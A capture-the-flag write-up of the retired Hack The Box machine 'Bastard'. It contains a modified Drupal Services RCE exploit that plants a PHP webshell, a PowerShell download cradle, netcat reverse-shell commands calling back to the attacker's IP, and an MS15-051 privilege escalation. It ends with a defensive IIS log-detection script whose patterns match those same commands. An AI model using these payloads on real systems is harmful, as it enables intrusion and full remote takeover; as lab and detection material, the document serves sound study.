This is the write-up for the box Bastard, which was retired on 16 September 2017. My IP address was 10.10.14.23 while I did this.
Let's put this in our hosts file:
10.10.10.9 bastard.htb
Starting with an Nmap scan:
nmap -sC -sV -o nmap/bastard.nmap 10.10.10.9
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
|_http-generator: Drupal 7 (http://drupal.org)
| http-methods:
|_ Potentially risky methods: TRACE
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Welcome to 10.10.10.9 | 10.10.10.9
135/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Since the web server is IIS 7.5, the OS of the box is most likely Windows Server 2008 R2.
The web page is a Drupal installation. One of Drupal's default files is /CHANGELOG.txt, which tells us the installed version: 7.54, released on February 1st 2017.
Looking for exploits for this:
searchsploit drupal 7
The exploit to use is called "Drupal 7.x Module Services - Remote Code Execution", a PHP serialization vulnerability. We change some lines in the code to get command execution and file upload, and set the variables correctly:
# (...)
$url = 'http://10.10.10.9/';
$endpoint_path = '/rest';
$endpoint = 'rest_endpoint';
// PHP written to the target's web root: ?upload=<name> fetches <name> from our
// HTTP server on port 8000, ?exec=<cmd> runs <cmd> and returns its output.
$phpCode = <<<'EOD'
<?php
if (isset($_REQUEST['upload'])) {
    file_put_contents($_REQUEST['upload'], file_get_contents("http://10.10.14.23:8000/" . $_REQUEST['upload']));
}
if (isset($_REQUEST['exec'])) {
    echo "<pre>" . shell_exec($_REQUEST['exec']) . "</pre>";
}
?>
EOD;
$file = [
    'filename' => 'exploit.php',
    'data' => $phpCode
];
# (...)
Run the exploit:
php5 drupal_exploit.php
# Output
#!/usr/bin/php
Stored session information in session.json
Stored user information in user.json
Cache contains 7 entries
File written: http://10.10.10.9//exploit.php
Now, when browsing to this page, we can test whether we have command execution:
http://10.10.10.9/exploit.php?exec=whoami
It outputs that we are NT Authority\iusr.
So we now have command execution through this method. Alternatively, the token stored in session.json could be set as the browser's cookie values to get logged in as the admin user.
We should run an enumeration script on this box to map the attack surface. I will run PowerUp.ps1 from the PowerSploit framework first.
Fetch the script from my local machine and run it in memory:
.../exploit.php?exec=echo IEX(New-Object Net.WebClient).downloadString('http://10.10.14.23:8000/PowerUp.ps1') | powershell -noprofile -
Unfortunately there is no interesting information in this output, so let's run another enumeration script. I will run Sherlock now to get some suggestions for vulnerabilities to exploit.
Next we upload Netcat for Windows (nc64.exe) to the box and execute it to get a reverse shell:
/exploit.php?upload=nc64.exe&exec=nc64.exe -e cmd 10.10.14.23 9001
After running this, our listener on port 9001 receives a reverse shell.
The enumeration script suggested some exploits to use, and I will use MS15-051, the Win32k LPE vulnerability also known as CVE-2015-1701. To use this exploit we copy the proof-of-concept from GitHub to our local machine, then upload and execute it on the box.
/exploit.php?upload=ms15-051x64.exe&exec=ms15-051x64.exe whoami
This outputs that we are NT Authority\SYSTEM, so the exploit works and we can use it to start a shell.
/exploit.php?upload=ms15-051x64.exe&exec=ms15-051x64.exe "nc64.exe -e cmd 10.10.14.23 9002"
After running this, our listener on port 9002 receives a reverse shell as NT Authority\SYSTEM and the box is done!
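For the defender's view of the same activity, here is an added example (not part of the original write-up) that parses IIS W3C log lines and flags the request patterns this box's attack chain leaves behind: the /CHANGELOG.txt version probe, POSTs to the Services REST endpoint, the exec/upload webshell parameters, the PowerShell download cradle and the netcat command. The log lines and rule names are constructed for the example; the column order comes from the #Fields: header as in real IIS logs.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (not from the write-up); the #Fields: header
# fixes the column order exactly as real IIS logs do.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2017-09-16 10:11:58 10.10.10.9 GET /CHANGELOG.txt - 80 - 10.10.14.23 Mozilla/5.0 200
2017-09-16 10:12:01 10.10.10.9 POST /rest/user/login - 80 - 10.10.14.23 PHP/5.6 200
2017-09-16 10:12:03 10.10.10.9 GET /exploit.php exec=whoami 80 - 10.10.14.23 Mozilla/5.0 200
2017-09-16 10:12:40 10.10.10.9 GET /exploit.php exec=echo+IEX(New-Object+Net.WebClient).downloadString('http://10.10.14.23:8000/PowerUp.ps1')+|+powershell+-noprofile+- 80 - 10.10.14.23 Mozilla/5.0 200
2017-09-16 10:13:10 10.10.10.9 GET /exploit.php upload=nc64.exe&exec=nc64.exe+-e+cmd+10.10.14.23+9001 80 - 10.10.14.23 Mozilla/5.0 200
2017-09-16 10:14:00 10.10.10.9 GET /node/1 - 80 - 192.0.2.10 Mozilla/5.0 200
"""

# Patterns matched against the URL-decoded query string; they cover the
# download cradle and the netcat command used in the write-up.
QUERY_RULES = [
    ("powershell-download-cradle", r"new-object\s+net\.webclient|downloadstring|\biex\b|powershell"),
    ("netcat-reverse-shell", r"nc64?\.exe|\s-e\s+cmd\b"),
]

def parse_iis_log(text):
    """Yield one dict per request line, keyed by the names in the #Fields: header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif fields and line and not line.startswith("#"):
            yield dict(zip(fields, line.split()))

def classify(entry):
    """Return the rule names one request trips (empty list when nothing matches)."""
    hits = []
    stem = entry.get("cs-uri-stem", "").lower()
    query = unquote_plus(entry.get("cs-uri-query", "-"))  # IIS logs '+' for spaces
    if stem == "/changelog.txt":                      # version fingerprinting file
        hits.append("drupal-version-disclosure")
    if entry.get("cs-method") == "POST" and stem.startswith("/rest/"):
        hits.append("services-rest-endpoint-post")    # Services module endpoint
    if stem.endswith(".php") and re.search(r"(^|&)(exec|upload)=", query):
        hits.append("webshell-parameter")             # exploit.php's two parameters
    for name, pattern in QUERY_RULES:
        if re.search(pattern, query, re.I):
            hits.append(name)
    return hits

def scan(text):
    # (time, client IP, path, rules) for every request that trips at least one rule
    return [(e["time"], e["c-ip"], e["cs-uri-stem"], classify(e))
            for e in parse_iis_log(text) if classify(e)]
```

Running scan(SAMPLE_LOG) flags five of the six constructed requests, all from 10.10.14.23; the benign /node/1 request from another client is not reported.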